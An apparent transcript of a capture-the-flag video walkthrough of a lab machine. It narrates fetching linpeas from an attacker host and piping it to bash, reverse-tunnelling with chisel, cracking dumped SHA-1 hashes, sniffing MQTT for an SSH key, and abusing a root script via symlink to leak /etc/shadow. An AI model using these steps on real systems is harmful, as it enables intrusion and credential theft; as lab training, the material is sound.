0xdf will go into that, but if you do products / maybe verify signature or protobs, yeah, you can download the Python file. So let's now import the elf. This is the unmodified one, so we'll just take a screenshot of the one function and look at it so you can see the difference before and after we modified that. So let's see. Functions, main, wait for key, shift, print screen, select an area, copy to clipboard, paste. Oh God. The tooltip covered it. This is not my day or time right now. Shift print screen, select an area. I choose you, copy, paste. So the very first system call, that's what this should look like. And since we overflowed it, it's going to the next string in the binary, which is user dev console utility. And that is right here. So we're injecting into this actual puts call, if you see there. And then the system call stty_sane. It's doing a portion of that. So I guess how the string is referenced in the program, it's grabbing a snippet of something, or maybe it's this string and then stty_sane and then this string in the binary. So we overwrote 3 strings just writing this one string. And that's why I put a semicolon at the end of this. So hopefully that kind of makes sense. Just know when you go in a hex editor and you start editing things greater than what you're allocated to, weird stuff will happen. So didn't matter that much here. With the shell on the box, let's see, what do we want to do? We can go to /home. There is a user called observer. And can we grab his user.txt? It doesn't look like we can because of the permissions. Only observer can read that. And we are www data. .sh can't access it. So at this point, let's run linps. So let's go up one directory, make dir www, and then cp opt privilege escalation script awesome suite linpeas, linpeas.sh, python3, http.server, curl 10.10.14.2, 8000, linpeas.sh, and we'll pipe it over to bash and let this run. Linpeas has now finished, so let's go take a look at what we have. Okay. So I don't know why that sudo version is highlighted. It does say go check here, so let's definitely check this out. It may be that sudo like underflow bug, where if I forget exactly what it is. Yeah, I don't. It's not really being too descriptive of what's there, but I don't think that's really anything. It doesn't highlight the P2, so it's probably just looking at 1821. So we'll just move on. Sometimes don't know things and should look at it more in depth. We see ASLR is enabled. Useful binaries. Let's look at all the processes. So MySQL. I don't know what this is. Egress is running something. So let's highlight things we want to look at. Scratchpad. We'll say egress runs things. MySQL hashes. What is that? I have no idea what that is. Egress PHP. So he's just running the PHP web server. Nothing there. Crons look normal. Looks normal. We have this port. I'm guessing that's with the Mosquit or whatever it is. Ooh, 1883 I think was the port. Sweet. Page down. Super users. So we may want to try to get to the egress user, and then we could maybe check for a sudo rule. That's one path. Observer obviously as well. SSH root can log into the box. It's identifying an image magic mime.xml as a SSH key. That's funny. Set UIDs. Capabilities. Nothing too interesting. So, didn't get too much. Let's try, the odd thing if we look at /home, we only saw observer. I didn't see the egress user. So I'm going to cat etsy passwd, grab for EGR. And we can see his home directory is that. So maybe this guy is not even on the box. So sudo rules for him probably aren't going to happen because, I mean, all we can tell, he doesn't exist. So it was just an account set up probably to run some things, but it doesn't hurt to look at the MySQL database. Let's go into /var dub. And then I think product is where the login was. And since that's where the login is, that's probably where there's going to be the database. So cat con.php. And we can see localhost devdb. So no password on that. MySQL. Okay. -u dev -p dev -D dev db. Password is dev. Connect -H localhost. Let's see. MySQL localhost dev db. Let's look at this MySQL connect thing. I thought this is the password. MySQL connect and PHP. My user, my password, my DB. So I mixed them up. So the database is dev, the password is dev db. There we go. Show tables. Select star from users. And we can see everyone's backup code and some type of hash. Let's see, echo -n, wc-c, 40 characters. That's probably a SHA-1 sum. SHA-1 sum test. Echo -n, wc-c, 40. So we could try cracking the users we didn't get, snowscan and mprox. I'm guessing it's going to be random passwords as we just didn't crack it before. So let's copy 0xDFs, SSH into the Kraken. I don't have my SSH host key set on this. Is it just IP? And failed to ban blocked me now. So I can't get in my Kraken box. We can probably just try hashcat on a VM. It's going to be slow. Cat passwords.txt. Okay. Test. Or what was I doing? Hashes. So we can paste all the hashes actually. So we did 9E, 0A, this one, and this one. Okay, all the hashes there. So we can do hashcat -- force, or before we do that, we need example hashes. SHA, probably SHA-1, mode 100. Hashcat force -m 100. Then the hashes file, and then the word list, which is passwords.txt. See if this even works. May not work. Oh, we cracked them all. So all those were valid passwords. Why some users couldn't log into the website, I don't know. But we could try all these passwords for various users. So quit cat passwords.txt, and we can try manually SUing with these. So SU-observer, paste, SU-egress, and if we tried all these, I'm 99.9% sure it doesn't work. So I don't feel like wasting a few minutes trying when I have the power of hindsight to know that doesn't really get anything. So we got through MySQL. We could potentially psef grep egress and see what he does. So he's executing the 8545 and also for www server.php. If we look at this, we can see only he can write it, so we can't exactly modify it. Doesn't look like there's anything we can do to get to him easily. So the next thing to look at is this service. So you could also run like pspy and see all the processes that are running on the box every minute. Let's see. lsla grep. Do I have it? I probably don't have it installed here. pspy GitHub. And we'll download the small one. Where is releases? There we go. Big static, small. Save. www mv downloads pspy. And then we can download it. So let's go to dev shm curl 10.10.14.2 8000 pspy 64s. I think that was the name. Yep. chmod plus x. And when we run it, it'll show all the files that start getting executed. And we got a configuration file right off the bat. Paste that. Looking and date. How close are we? We're 15 seconds away from a new hour. So as long as the time on our box and the server is correct, any cron that would run in a minute should happen in 5 seconds. In 2 seconds. We should be seeing some things pop up in the terminal if our time was in sync. Or also if things ran every minute. So nothing there. Let's go back into opt. Do I have chisel installed? lsla opt grep chisel. I do not. So let's go download chisel. Chisel GitHub. And is there a release here? There is. Downloads. So we probably just want the Linux x64. 386. AMD 64. There we go. Save. Still. Oh, we do have some things pop up. So let's see. Cron, MySQL, and uploads thing. So maybe there's some type of script that periodically uploads. We got a Python root connections.py and root broadcast.py. So based upon broadcast.py, I'm going to be guessing there's some type of network traffic going on. I'm going to kill this and see if we can cat that file. We can't. So keep running that while we do chisel. So let's go into www, move, downloads, chisel, gzip-d. Let's rename this to just be chisel, chmod plus x, chisel, and we can do chisel, server-p. We'll run it on port 8000, and we want a reverse thing. What we're doing with chisel is, oh, I have HTTP server. Let's do 9002. What we're doing at Chisel is directing this port 1883 back to our local box. So we can get rid of that. Go back to the curl, and we'll download Chisel. We need -o. And then we can do /chisel, chmod plus x, chisel, now /chisel, turn it to client mode, connect to 10.10.14.2, port 9002, create a reverse tunnel, port 1883, 127.0.0.1, 1883. So what this is doing, LVM, let's do SSLNP, grep 1883. So we're not listening on this port right now, but when we connect, now we are. So what this is doing is whenever we connect to localhost port 1883, it's going through Chisel and then going out this end. If you're confused, I'd highly recommend going to ipsec.rocks, typing in reddish, and going over maybe reddish. Oh, reddish. I thought we could do spaces. Or PowerPoint. There we go. Look through each of these in reddish to understand what we're doing. But let's see, the next thing we can do is probably netcat our port. So, or not netcat, nmap ourselves again. So let's go back to this pane, nmap-sc sv-p 1883-n localhost. We can rename this one to rev shell. And script execution failed. Use -d to debug. It's weird. What happens if we just netcat to that port? So nc localhost 1883. Can't really do anything. Let's try doing with sudo. Because we got a nmap script MQTT subscribe.nsc, and this MQTT that's trying to run, but for some reason it's erroring out. Bad argument to unpack. Yeah, I'm not sure exactly why that's erroring, but sometimes nmap does that. So let's see. Mosquito sub MQTT. So we want this package to be able to run this command. So essentially, MQTT is, I believe, a message broker. And it's kind of how like applications can talk to each other. Maybe like RabbitMQ. I kind of go over something like this in, do I still have ipsec.rocks up? Sec.rocks. I think we have a Kafka thing. I kind of go over this. Yeah. In this video, this attack is similar to what we did in the securing vendor web apps video, which I'd recommend watching. But we're going to connect to the MQTT database and then subscribe to messages, which allows us to listen. So let's play that out. Apt search Mosquito. I don't know what this is, but let's see. Sudo apt install that, and let's do the client as well. Clients. Weird that has an S on the end, but let's install this and see if it gives us that package we want, which is the subscribe. So we can maybe Google Mosquito list. I think it's called topics. Request all. Ooh, I bet this is why the NMAP script actually failed, because we didn't have these binaries on the box. NMAP, let's try this again. Now that we have the binaries, it may actually work. Or not. So let's see. Connect to the server with subscribe that. So mosquito underscore sub dash dash help. There's a lot of options here. So it subscribes to a set of topics and then prints all the messages it receives. But we don't know the topics on this. Mosquito. What is this tool? RR. Publish a request message and wait for a response. That's not it. So if the actual nmap command worked, it would have listed a bunch of topics for us. Wouldn't be that helpful, but it may have helped to make sense later. If we do MQTT topics, see what this is. Does this say wildcard? So plus is a one level and multi-level is a hashtag. So we can subscribe to all topics by doing mosquito sub dash T for topic, put a hashtag dash H 127001 dash P 1883. So now we should be listening for any topic on the box. There is one catch to that, and that is topics beginning with a $sign. The wildcard won't catch. So we also want to do a second one and do sys /. And I think the sys topics are reserved for like internal system like health use, I believe. So give this probably a minute and we may see something. So whenever it checks. And this one is probably why it had, when we looked at the pspy and saw the random firmware check, looks like there's some automation going around to do that. So hopefully we see this go again and then we can see other things in this system tab. There we go. Checking firmware updates, no updates, and nothing. I'm just going to let this go for a few minutes to see if we get anything. I'm pretty sure I should have had something, and I think the actual topic is sys and it begins in caps. There we go. Almost instantly we get data back. So yeah, the sys table has is capital. And it looks like, whoops, there is something here, and it's saying retrieving key from the AWS instance, and then we have an SSH key. So we can grab this key and then try using it to log into SSH. So we'll call this aws.key, paste chmod 600, sh-i, aws.key, egress was a user at 10.10.10.170, nothing, and observer was the second user. And we get logged in. So we found a key through just the message broker being open. And there's actually a unintended route here to get stuff. So let's go cd.ssh, and we can overwrite this key. So if I move idrsa to idrsa.back, and we did like a symbolic link, so root.txt, idrsa, we can't actually read idrsa because it points over to root.txt. But if this script is grabbing this text file and then throwing it into the message broker, and that script runs as root, we'll be able to grab it. So let's try shadow actually. Etsy shadow. And if shadow works, rm ID RSA. If shadow works, then just know it would have worked for root.txt. And there we go. We have grabbed Etsy shadow off the box. And if it had a weak password, we could crack the root password and get in. There's other files we could potentially grab, maybe look for crons or things like that. But I don't know if there's anything here that if we can read with root permissions, we can use it to upgrade a shell in the box. But that is just a fun unintended route. So let's be kind and restore this IDRSA thing. And unfortunately, I just edited the video to jump back to this part because I spent the next like 6 to 7 hours trying to figure out a good way to explain heap exploitation because we haven't covered that here before. But it's just not a topic I'm super familiar with, and I really don't like how that whole portion turned out. And after doing recording for probably the better part of a day, I'm just going to take a break, and maybe sometime next week I'll revisit and we'll learn how to do some heap exploitation. So I'm going to go ahead and leave you off with the grabbing root.txt in case for some reason you didn't know what I was talking about earlier. Just create a symbolic link to that. So let's move this IDRSA back to .back. Create this, and we'll wait for the program to read IDRSA and send it to MQTT. And once it does that, we'll get root.txt and be able to call it a day. So again, sorry for not being able to complete this machine, but some things are just really hard to explain, and walking through heap and objects in GDB is definitely not super easy to do, and I don't know. So that'll be the video. I hope you guys enjoyed it. Take care, and we'll see you all next week.